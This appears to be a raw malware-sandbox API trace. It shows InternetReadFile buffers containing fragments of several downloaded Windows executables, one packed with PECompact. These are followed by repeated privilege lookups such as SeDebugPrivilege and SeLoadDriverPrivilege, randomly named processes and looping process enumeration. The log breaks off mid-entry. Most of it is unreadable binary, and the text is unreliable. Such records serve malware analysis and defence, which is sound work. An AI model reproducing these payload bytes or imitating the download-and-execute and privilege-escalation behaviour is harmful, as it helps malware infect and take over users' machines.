 buffer: rSÑ<¡ö?ÀЈ:G‘ö?hhö?g6Ÿqö?ù"Qjìaö?£J;…ORö?d! YÈBö?ÞÀŠ¸V3ö?@bwú#ö?”®1h³ö?X`ö?ü-)4döõ?çи[çõ?¥âìÃgØõ?W“+ˆÉõ?‘úGƼºõ?ÀZk¬õ?ªÌ#ñaõ?íX0Ҏõ?`XV€õ?:kP<íqõ?âR|º—cõ?UUUUUUõ?þ‚»æ%Gõ?ëôH 9õ?K¨Vÿ*õ?øâêõ?ÅÄá"õ?PPõ?›LÝbóô?9/§àåô?L,ܾCØô?n¯%‡¸Êô?ᏦÝ>½ô?[¿R Ö¯ô?Jv­¢ô?gвã9•ô?€H"ˆô?{®Gázô?f`Y4Îmô?šÏõÇË`ô?ÊvÇâÙSô?ûÙbeøFô?Mî«0':ô?‡Õ%f-ô?QY^&µ ô?ô?feтô?û°?ûó?¯¥Bîó?©ä¼,âó?Æuª‘ÙÕó?ç«{¤•Éó?U)#Ù`½ó?;±;±ó?"Èz8$¥ó?c,™ó?ŽfÓ"ó?88ó?îEÉÑ[uó?HÞóió?ø*Ÿ_Î]ó?Áx+ûRó?Fà¬yFó?²¼W[ä:ó?újí\/ó?¿+Jã#ó?¶ëéXwó?Ñ0 ó?`Ä*Èó?h/¡½„öò?KÑþ¡Nëò?—€KÀ%àò? P- Õò? ,MûÉò?7ZŽù¾ò?@+­´ò?Áó’©ò?žä)Ažò?¥¸[r“ò?°ˆ°ˆò?MΡ8ú}ò?5'¸Psò?'Ö|³hò?ñ’€p"^ò?²w‘~Sò?’$I’$Iò?[`—·>ò?ß¼šxV4ò?* "*ò?xû!·ò?æUH€yò?ÙÀg G ò?  ò?pÁ}÷ñ?L¸<ôìñ?t¸?;ïâñ?½J.gõØñ?¢­Ïñ?Yàü"Åñ?)íF@J»ñ?ãºòg|±ñ?–{a¹§ñ?žàžñ?œ¢Œ€S”ñ?Û+ƒ°Šñ?ñ?„ÖŠwñ?ysB‰nñ?2üPdñ? 'u_[ñ?ÉÕý£¹Qñ?;Í _Hñ?$G4?ñ?È5È5ñ?¬À퉋,ñ?30]çX#ñ?&H§0ñ?ñ?€¾ûñ?ðþðþð?¢%³úíõð?œækõìð?`‚Uäð?–F¨ Ûð?:ž5VDÒð?;Ú¼OqÉð?qA‹†§Àð?ȝ%ìæ·ð?µì.r/¯ð?§h ¦ð?`ƒ¯¦Ûð?T 9?•ð?âeu³«Œð?„B!„ð?âê¸)Ÿ{ð?Æ÷G &sð?ûyœµjð?ü©ñÒMbð?†ur îYð?4×÷—Qð?ÅdÌIIð?AAð?üG‚·Æ8ð?^µ‘0ð?é)wüd(ð?@ ð?7zQ6$ð?ð?€ð?ð?log10ÿÿÿÿÿÿ?Cÿÿÿÿÿÿ?ÃUnknown exceptionbad array new lengthabcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZpidhtmpfile.tmp.dllpidHTSIGwbTaskmgr.exekernel32.dll%uLoadLibraryAvector too longstring too longMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $šˆÞévMÞévMÞévMʂrLÕévMʂuLØévMʂsLGévMՆrLÐévMՆuL×évMՆsLýévMʂwLÝévMÞéwM¼évM†LßévM†‰MßévM†tLßévMRichÞévMPEd† Ì<að" ¶øTZ€`¬z(àà°Üð„X8ÐX0А.textŵ¶ `
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $PEL;êÐ^à  : û+P@` „º€P‰P fSÐQPn@P„.textÜ9: `.rdata,BPD>@@.data@[ $‚@À.rsrcfS T¦@@VD$P‹ñèjÇRA‹Æ^ÂÇRAé V‹ñÇRAèöD$tVèbY‹Æ^ÂÁà‰ÃU‹ìQƒeü‹EEü‹Eü1ÉÂ3D$Ì6ïÆÃÃU‹ì‹EìˆSV‹03ہ=¼éI4W‹xuISSÿ PASSÿ PAÿŒPASSSÿHPASSSSÿPASÿ(PAE¼PÿTPAS…|÷ÿÿPSÿpPA=¼éIN‰]øuSÿhPAS…|÷ÿÿPSè¡è³A‰EØ¡ì³A‰EԍEøÇEà¹y7žèHÿÿÿƒEøT=¼éIT u4…|ÿÿÿPhxmASSSÿ0PASSÿdPASSSÿ„PAS…|÷ÿÿPÿˆPA¡ð³A‰EÜ¡ô³A‰EäÇEè ÇEðƒEð‹ÆMôè´þÿÿ‹EÜEô¡¼éI=©u ÇŒ9I@.ëí=ëuSSSÿ$PASÿPA‰„I‹Mð‹ÆÓè‹MäLj9I.ÎP‘‰EìEìè‡þÿÿ‹EøÆP‹Eôèkþÿÿ‹Mì3ȉEô+ù%»RÀ]‹ÇMôè5þÿÿ‹MԋÇÁè‰EìEìèMþÿÿ‹Eø‹MØÇP‹EôÁè,þÿÿÿuìMô‰Eôèþÿÿ+uô‰@C‹Eà)EøÿMè… ÿÿÿ‹E‰x_‰0^[ÉÂU‹ì¡¼éI‹ ˆIì$ SVÁè3öW;Ævl‹ù‹Ø=¼éIé uPÿPAVEüPV…àûÿÿPVÿ,PAV…àóÿÿPVÿDPAEäPÿ@PAVh¼mAÿlPAVVÿPAVVVÿxPAWè‚ýÿÿƒÇKu˜_^[ÉË ÀéIV‹5ˆIW‹=¼éI3À…ÿvŠ”;- ˆ0@;Çrñ_^Ãÿ5¼éIjÿ8PA£ˆIÃU‹ìQQÇEü ƒEü EøPÿuüÿ5¼éIÿ5ˆIÿDCÉÃ3ÀŠˆ nAˆˆPÍA@„Éuïø¾IAè‚5ì$VW3ÿ=¼éI ubWWÿ PA3ÀjuÐÇEè‰}äf‰EÔèW‰}üèYWWèŠWèƒÄ WWWèY‹Ä‰8‰xèÃÝ؃MüÿƒÄWjèƒèe
request_handle: 0x00cc0024
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÌêà 0ÂF>á @ €`…ìàOºC`  H.textDÁ  `.rsrcºCDÄ@@.reloc `@B áHàf zXÀ„â(™*2r7p(- &*2rsp(- &*2rÙp(- &*N(. t &(/ *Fo0 3(/ *2rMp(- &*z,{, {o1 (2 *Rþsi (j &*bok (l (m (n *Z{o} (~ (x *¶(. u (€ o.(. u ( o/*>}}*z,{, {o1 (2 *{4*"}4*(é *J{W(ö oü *J{X(ö oü *(4*j{6,{6o'oj*–{Ao 3{<{Ao o" *(:*¦{Oo! ,{5{Oo  (® o" *¦{No! ,{5{No  (® o# *:(| (&*6{7},*(D*j{U{Moþ þo‡ *¦{Wo! ,{5{Wo  (® o‚ *¦{Xo! ,{5{Xo  (® oƒ *š(:(}{Zo  o‡(}o2 *(E*‚(}{Eo  o…(}o2 *‚(}{Loþ oƒ(}o2 *Æ(}{]oí o‰(}o2 {]oí (N*Šo; ~< o= ,o> *o> *‚(}{<o$ o(}o2 *z,{:, {:o1 (2 *>(>d( +ñ‚(}{co  o‹(}o2 *Ž{ao— ,(}o(}o2 *Ž{`o— ,(}o(}o2 *Ž{bo— ,(}o(}o2 *Z(˜ r p(™ (- &*n(˜ r"p(™ r:p(š &*z,{_, {_o1 (2 *(/ *šrtp(´ (. u {to  oB*z,{l, {lo1 (2 *(› *^{v{r{wo· *®~x-rTpÐ(4 o¸ s¹ €x~x*~y*€y*j(qrªp~yoº t4*j(qrÂp~yoº t4*j(qrÚp~yoº t4*j(qròp~yoº t4*j(qrp~
request_handle: 0x00cc0048
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $“ þ}×k.×k.×k.c÷a.Úk.c÷c.[k.c÷b.Ïk.IËW.Õk.ì5“/Àk.ì5”/Äk.ì5•/þk.Þ.Ýk.Þ.Òk.×k‘.!k.@5•/ñk.@5/Ök.E5o.Ök.@5’/Ök.Rich×k.PEL³Ý^à `ö`<p@€@Á ÿ4Ôÿ<pÐßPì'èT8’@p ”ö.text _` `.rdataœpžd@@.dataM@À.didat\`@À.rsrcÐßpà@@.relocì'P(ò@B¹p=Cé›ÌÌÌÌÌÌh nBè'&YÃÌÌÌÌè,Y£ð¯CÃÌÌÌÌ̹°CéVgÌÌÌÌÌ̹0µCè”Çh°nBèí%YÃÌÌÌÌÌÌÌÌÌ̹è°EèFhÀnBèÍ%YÃÌÌÌÌÌÌÌÌÌ̹t EéùÌÌÌÌÌ̹ˆ Eèh'hÐnBè%YÃÌÌÌÌÌÌÌÌÌ̹ò!Fè´EhànBè}%YÃÌÌÌÌÌÌÌÌÌ̹r Eè”EhðnBè]%YÃÌÌÌÌÌÌÌÌÌ̹ð EèUhoBè=%YÃÌÌÌÌÌÌÌÌÌÌU‹ìì,EüPÿ\`F…Àt2Àëf‹E3ɉE܍…Ôýÿÿ‰Eä‹E ‰EèEÜVP‰MàÇEìA‰Mð‰Môÿ``F‹ð…öu2Àë)WÿuVÿd`F‹Mü‹øVQ‹‹r‹Îÿ rBÿÖ3À…ÿ_•À^‹å] ¶D$ Pÿt$ ÿt$ ÿ4aFPÿ0aF ¶D$ ÷ØÀƒà Pÿt$ ÿt$ ÿ4aFPÿ<aF U‹ìƒ} 0tY} u]ŠE ¹ˆ E$¶ÀPÿuÿuèþ4öE t>ÿuÿ(aF…Àt1h!0Pÿ4aF…Àt!öE thDuBPÿ,aFë ÿu¹ˆ Eè“42À]¸umBèë QV‹ñ‰uðèIƒeüŽ£èUŽt£ÆEüèUŽÔ£ÆEüèòTŽ4¤ÆEüèãTŽ”¤ÆEüèÔT‹ÎÆEüèÈ‹Mô‹Æ^d‰ ‹å]ÃU‹ìd¡jÿh%nBPd‰%V‹ñƒ>t€~t ‹FÀPÿ6èyEÿ6è˜sY‹Môd‰ ^‹å]Ãé±ÿÿÿÁ4¤é@U¸ è@ SUVWjjÿ´$( è^‹Œ$ ‹ØèúU½颍D$PèB#‹ð·Qè"€¼$ t „Àt3Àf‰ë„ÀtUh@uBD$PèSjjD$‹ûPèø‹ðfƒ>*u:·NQèÎ!„Àt,j.Xj\f‰„$XUf‰„$„$SPèjS¼$ÿ´$( WV蜄Àu'‹Œ
request_handle: 0x00cc0024
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $ª½ˆDËÓÛDËÓÛDËÓÛ9²3ۉÊÓÛI™6ÛFËÓÛM³WÛEËÓÛš ÛrËÓÛš3ÛKÊÓÛš2ۗÊÓÛM³PÛKËÓÛM³@ÛmËÓÛDËÒÛÕÈÓÛI™3ÛEËÓÛI™2ÛtËÓÛI™ÛEËÓÛDËDÛEËÓÛI™ ÛEËÓÛRichDËÓÛPELÀ]aà  î0ú&1@ÀZd½"@‚Z X ]°Z$PZHx~<`.textXvPEC2~O à.rsrc X†z à.reloc°Z"@À¸xšPdÿ5d‰%3À‰PECompact2Yy;*³ÿ‹&¥Ôù&@RrÁü§m=KýŽyžº³‡J¥†„S`ÕšÛÆúÑ!_šTߘü€Úr-í¡³DòùõŠé©A§uþ”ßB&8?>“¡›ZØ¥êB¡pØr_Gæse`‰`6¢|€Ý«¬g·[\Cˆ÷—X€W^u*Ýu¡ºv§JYB0?ܹ1\³¸?R+ò-)³AÌӎJÅΔR_Mv3Ié¶\é“+Z±Ë^ÿcÆjñQ'>ÅðÀ'Œ¶Æ‰l¤2‘wë«<çûÑqT¬ ܛi¦­‰ô·)¤^ÉÙGfQOpåo?Nóàéÿ¿Çèÿ'™ˆ0ˆaJõ¬ÕÞ¸Šâ¼…+užÔæ3ƒŠ( ®Q3ÜFZZgœ#­èȪg ôs IslïOÞ9™]ÂlґhùÔüÈöUïžbüc¬gƒ DN€HrJMÑ2°aI’ÏÑа—aèœr±Œõ€¹>BºàƒJßR¹³)߂.Ä;î–1Ç4×~¼Qá`F·ªR¼&ñm¬IÒGoÅü"®³mSȞ„Cå(¤kÐIQ˜ç½õ—õ°…Ñå{kùÔ´W_’*R<“÷#¡ÚàJßÿve[_íK q•î·ßƒ¬U½ôC Ëd0ŽGD­ÖùúaŠÚæŸó?¿rìuŽXÃdÄóM¸LH`Q¹ó­Úrï‰Ð8YU×v‡E•ß‰ì‚“0ÝÝÀŸrš¡I¦.QÉÜI”›T\eàcÐs„¸¸…XxŽ^¬hÙ~W &ûÂf݀l–Uc¬•‡pž«S ò®Gƒ£}Ž =a‹óïӘ‚á¸nQP;[¥u¯gÁJ¨XÄýª¯ªšØ}Îñ"ï Ò—‚ïÜÞ{*¡¶»ÁhüïgŒfŽºOq@›³â·–Kiñ)‚ª”:ðoópú¼mû,³}í}‹%¨')ÐçÄk•êÕd[¿–Œš²àl¨ÉvmøԣѤ±lÈäSü~DÕRð,þ˜vªc"Zäý«c¥>(Ð\Þ¨#u¡VJ÷w™™*yÆ´8| ³wƒÉdÈa {´Œ*¦¤ŠŸû_‡Œiãvû8õx>‹ZEÃ`‚ªÈoû_ñÂÞQ¸ù´²/{Jn{þ—¦Õ¶0dåG\ß­&÷`‡ŸîölŽê¯Ø^í˜àÑÞ© Y2_¤s€õá÷W”ñY@ëœgí&Ý#Z:÷ã=—.Ž˜ß¨*êC’¶kt¬È¬w@ñ¢Hêþ‚kÖs@ìé!j»Š<[8 uí3
request_handle: 0x00cc0048
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $RSovSovSov<Ýyov<èCov<Ü0ovZåTovSow:ov<ÙRov<ìRov<ëRovRichSovPEL@Ƚ^à  vdF@ H¸LP€G`5ÀG@Б°ühü@„.text[uv `.rdatad}~z@@.data SE–ø@À.tlsÁpGŽ@À.rsrc`5€G6@@.reloc<XÀGZÆ@B‹ÿU‹ìèè]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìjþh@þAh@S@d¡PƒÄ˜SVW¡dB1Eø3ÅPEðd£‰eèÇEE Pÿ<Aƒ=c‡ujjjjÿ|A莉E”èvB…Àu jèKƒÄèÓ;…Àu jè8ƒÄjè;ƒÄèÖÇEü躅À} jè?ƒÄÿœA£c‡èœ£ ¥Dè…À} jèƒÄè …À} j èƒÄjèڃĉEœƒ}œt ‹MœQèåƒÄè ‰E˜‹Ũât ·EЉEˆëÇEˆ ‹MˆQ‹U˜Rjh@è®o‰Eƒ}”u ‹EPèèWÇEüþÿÿÿë?‹Mì‹‹‰EŒ‹MìQ‹UŒRèWƒÄËeè‹EŒ‰Eƒ}”u ‹MQèûè6ÇEüþÿÿÿ‹E‹Mðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒ=(¥DuèmC‹EPèDƒÄhÿè·ƒÄ]ÃÌ̋ÿU‹ìƒìÇEü@‹Eü·ùMZt3ÀëI‹Uü‹EüB<‰Eø‹Mø9PEt3Àë.‹Uø·B= t3Àë‹Møƒytw3Àë‹Uø3Àƒºè•À‹å]ÃÌ̋ÿU‹ì‹E‹9csmàuO‹U‹ƒxuD‹M‹z “t*‹E‹y!“t‹U‹x"“t‹M‹z@™u è†F¸ë3À]ÂÌÌÌÌÌÌÌÌ̋ÿU‹ìh€@ÿ A3À]ÃÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒìÇEøÇEü=dBNæ@»t¡dB%ÿÿt‹ dB÷щ hB雍UøRÿ´A‹Eø‰Eô‹Mô3Mü‰Môÿ°A3Eô‰Eôÿ¬A3Eô‰Eôÿ¨A3Eô‰EôUèRÿ¤A‹Eô3Eè‰Eô‹Mô3Mì‰Mô}ôNæ@»u ÇEôOæ@»ë‹Uôâÿÿu‹Eô GÁà Eô‰Eô‹Mô‰ dB‹Uô÷҉hB‹å]ËÿU‹ìQƒ=c‡th
request_handle: 0x00cc0018
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $RSovSovSov<Ýyov<èCov<Ü0ovZåTovSow:ov<ÙRov<ìRov<ëRovRichSovPEL­Îå^à  vÔD@F́<PðE`50F@Бhü@„.text[uv `.rdataT}~z@@.data ÕC ø@À.rsrc`5ðE6@@.relocBW0FX8@B‹ÿU‹ìèè]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìjþh0þAh@S@d¡PƒÄ˜SVW¡dB1Eø3ÅPEðd£‰eèÇEE Pÿ<Aƒ=œÕ…ujjjjÿ|A莉E”èvB…Àu jèKƒÄèÓ;…Àu jè8ƒÄjè;ƒÄèÖÇEü躅À} jè?ƒÄÿœA£˜Õ…蜣 Cè…À} jèƒÄè …À} j èƒÄjèڃĉEœƒ}œt ‹MœQèåƒÄè ‰E˜‹Ũât ·EЉEˆëÇEˆ ‹MˆQ‹U˜Rjh@è®o‰Eƒ}”u ‹EPèèWÇEüþÿÿÿë?‹Mì‹‹‰EŒ‹MìQ‹UŒRèWƒÄËeè‹EŒ‰Eƒ}”u ‹MQèûè6ÇEüþÿÿÿ‹E‹Mðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒ=¨CuèmC‹EPèDƒÄhÿè·ƒÄ]ÃÌ̋ÿU‹ìƒìÇEü@‹Eü·ùMZt3ÀëI‹Uü‹EüB<‰Eø‹Mø9PEt3Àë.‹Uø·B= t3Àë‹Møƒytw3Àë‹Uø3Àƒºè•À‹å]ÃÌ̋ÿU‹ì‹E‹9csmàuO‹U‹ƒxuD‹M‹z “t*‹E‹y!“t‹U‹x"“t‹M‹z@™u è†F¸ë3À]ÂÌÌÌÌÌÌÌÌ̋ÿU‹ìh€@ÿ A3À]ÃÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒìÇEøÇEü=dBNæ@»t¡dB%ÿÿt‹ dB÷щ hB雍UøRÿ´A‹Eø‰Eô‹Mô3Mü‰Môÿ°A3Eô‰Eôÿ¬A3Eô‰Eôÿ¨A3Eô‰EôUèRÿ¤A‹Eô3Eè‰Eô‹Mô3Mì‰Mô}ôNæ@»u ÇEôOæ@»ë‹Uôâÿÿu‹Eô GÁà Eô‰Eô‹Mô‰ dB‹Uô÷҉hB‹å]ËÿU‹ìQƒ=Õ…th
request_handle: 0x00cc0030
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à ¤FЪÀ@P@@à| ,CODE¢¤ `DATAPÀ¨@ÀBSS”ЬÀ.idata| à ¬@À.tlsð¶À.rdata¶@P.reloc @P.rsrc, ,¸@PPî@P string<@m@Ä)@¬(@Ô(@)@ $)@Free0)@ InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName€(@ ClassNameIs¨(@ ClassParentÀ)@ ClassInfoø(@ InstanceSize°)@ InheritsFromÈ)@Dispatchð)@ MethodAddress<*@ MethodNamex*@ FieldAddressÄ)@DefaultHandler¬(@ NewInstanceÔ(@ FreeInstanceTObject@Í@ÿ% á@‹Àÿ%á@‹Àÿ%á@‹Àÿ%á@‹Àÿ%á@‹Àÿ% á@‹Àÿ%á@‹Àÿ%(á@‹Àÿ%á@‹Àÿ%á@‹Àÿ%üà@‹Àÿ%øà@‹Àÿ%ôà@‹Àÿ%ðà@‹Àÿ%ìà@‹Àÿ%èà@‹Àÿ%äà@‹Àÿ%àà@‹Àÿ%Üà@‹Àÿ%Øà@‹Àÿ%Ôà@‹Àÿ%@á@‹Àÿ%<á@‹Àÿ%8á@‹Àÿ%4á@‹Àÿ%0á@‹Àÿ%Ðà@‹Àÿ%Ìà@‹Àÿ%Èà@‹Àÿ%Äà@‹Àÿ%Àà@‹Àÿ%¼à@‹Àÿ%¸à@‹Àÿ%´à@‹ÀSV¾8Ô@ƒ>u:hDjè¨ÿÿÿ‹È…Éu3À^[á4Ô@‰‰ 4Ô@3ҋÂÀDÁ‹‰‰Bƒúduì‹‹‰^[Љ‰@ËÀSV‹ò‹Øèÿÿÿ…Àu3À^[ˉP‹V‰P ‹‰‰X‰B‰°^[ËP‹‰ ‰Q‹8Ô@‰£8Ô@ÃSVWUQ‹ñ‰$‹è‹]‹$‹‰‹P‰V‹;‹C‹ÐS ;u‹Ãè·ÿÿÿ‹C‰‹C Fë‹V;Âu ‹Ãèšÿÿÿ‹C F‹ß;ëu‹֋ÅèUÿÿÿ„Àu3À‰Z]_^[Í@SVWUƒÄø‹Ø‹û‹2‹C;ðrl‹ÎJ‹èk ;Íw^;ðu‹BC‹B)C ƒ{ uD‹Ãè5ÿÿÿë;‹ ‹r΋ø{ ;Ïu)s ë&‹ J‰ $+ù
request_handle: 0x00cc0024
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Š½@ÊÎÜ.™ÎÜ.™ÎÜ.™Ú·-˜ÞÜ.™Ú·+˜wÜ.™¢¨+˜ŸÜ.™¢¨*˜ÜÜ.™¢¨-˜ÔÜ.™¨&˜ÏÜ.™Ú·*˜ÖÜ.™Ú·(˜ÏÜ.™Ú·/˜ÙÜ.™ÎÜ/™7Ü.™¨*˜ÉÜ.™¨+˜ßÜ.™¨Ñ™ÏÜ.™Îܹ™ÏÜ.™¨,˜ÏÜ.™RichÎÜ.™PEL g^aà Šð3gÐ@ð@{  ¸4`ü€ p€@Ð .textq,. `.efagaghû@4 `.efagagh¹$P&D `.efagaghÊ€j `.efagagh]n `.efagagh£ r `.efagagh© °v `.efagaghÅ À „ `.rdata¼Ð¾@@.data¤w.N@À.efagaghP|@À.rsrc¸4 6~@@.relocü€`‚´@BU‹ìj¹(¼TèaP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìj¹,¼TèAP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìj¹4áTè!P ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìèˆÇ £áT]ÃÌU‹ìèxÇ £áT]ÃÌU‹ìj¹ãTèáO ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh,VR¹ðâTè®E h9QèNƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhVR¹âTè~E h 9QèïMƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh$VR¹ØâTèNE h09Qè¿MƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhVR¹¨âTèE h@9QèMƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh VR¹ÀâTèîD hP9Qè_MƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿh2Qd¡PƒìD¡D™T3ÅPEôd£ÇãT@Æ ãTh€URhôUREìPè÷ ƒÄ PM°èËÕ ÇEüMàQU°RMäèäL ‹HQ
request_handle: 0x00cc003c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à žÐø¥°@Ð@@ÐP (¿ðCODE0ž `DATAP°¢@ÀBSSÀ¦À.idataP Ð ¦@À.tlsà°À.rdatað°@P.relocÄ@P.rsrc(¿À²@P@è@P string<@m@Ä)@¬(@Ô(@)@ $)@Free0)@ InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName€(@ ClassNameIs¨(@ ClassParentÀ)@ ClassInfoø(@ InstanceSize°)@ InheritsFromÈ)@Dispatchð)@ MethodAddress<*@ MethodNamex*@ FieldAddressÄ)@DefaultHandler¬(@ NewInstanceÔ(@ FreeInstanceTObject@Í@ÿ% Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ% Ñ@‹Àÿ%Ñ@‹Àÿ%(Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%üÐ@‹Àÿ%øÐ@‹Àÿ%ôÐ@‹Àÿ%ðÐ@‹Àÿ%ìÐ@‹Àÿ%èÐ@‹Àÿ%äÐ@‹Àÿ%àÐ@‹Àÿ%ÜÐ@‹Àÿ%ØÐ@‹Àÿ%ÔÐ@‹Àÿ%@Ñ@‹Àÿ%<Ñ@‹Àÿ%8Ñ@‹Àÿ%4Ñ@‹Àÿ%0Ñ@‹Àÿ%ÐÐ@‹Àÿ%ÌÐ@‹Àÿ%ÈÐ@‹Àÿ%ÄÐ@‹Àÿ%ÀÐ@‹Àÿ%¼Ð@‹Àÿ%¸Ð@‹Àÿ%´Ð@‹ÀSV¾8Ä@ƒ>u:hDjè¨ÿÿÿ‹È…Éu3À^[á4Ä@‰‰ 4Ä@3ҋÂÀDÁ‹‰‰Bƒúduì‹‹‰^[Љ‰@ËÀSV‹ò‹Øèÿÿÿ…Àu3À^[ˉP‹V‰P ‹‰‰X‰B‰°^[ËP‹‰ ‰Q‹8Ä@‰£8Ä@ÃSVWUQ‹ñ‰$‹è‹]‹$‹‰‹P‰V‹;‹C‹ÐS ;u‹Ãè·ÿÿÿ‹C‰‹C Fë‹V;Âu ‹Ãèšÿÿÿ‹C F‹ß;ëu‹֋ÅèUÿÿÿ„Àu3À‰Z]_^[Í@SVWUƒÄø‹Ø‹û‹2‹C;ðrl‹ÎJ‹èk ;Íw^;ðu‹BC‹B)C ƒ{ uD‹Ãè5ÿÿÿë;‹ ‹r΋ø{ ;Ïu)s ë&‹ J‰ $+ù
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELŽÐ„à" 0¼ž7 @@  @…L7O@¸¸  H.text¤  `.rsrc¸¸@º@@.reloc Ô @B€7H¸³”ƒËÙ×ÂâÒé+Òû&–דÁ•-äd/ôyÎxäéxò ́~©6@ tÖ ÒP€“±Ñýٌül…t #9K(•hÇpð}? hãb3£ŠÝaŠ†h¼§Ðw‘êma[ävì'Nɧfœ d_ŸÀ=Çýñ¦B˜áêx^ ¢vš¹îSÚ= » æ}Ò9Ðå¦À)Öã1†L¼¯›Ùñ>&.ù0 ø–¸,ÍÎ-o7s@-0Š{š+ ‰›È´ ˆ×°C)aN'·°èüšo ªH¡¾í-߈™&hbÖ«äZþ„rÚîø¥ÀiÁqs¶¸Ø´Ì1“Ò(y$”GÂǪ‹^´iŒX]`¼ÍŒ½B‚Ä@óZ’mO,FX¹°J¨EÍÀ4ÞÆD˜_9„c ±Ý­wº$k–D`gpãÇ,®êFq–DK\иCîX,ŸÊ ™øvÀ´a`Zƪ¹ï5e¼£`nB”o)±¡¯PÁ‡5PJIøhÇçàüREb¨Á:ÉÛ»SW-`ªjŽötµÑ‹êPð™J6"
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTrustedCredManAccessPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
process 6aosph8vk68scxmnfvq7uzqb.exe
process u7bmz_jch5qwyeh3mrgkn8v4.exe
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

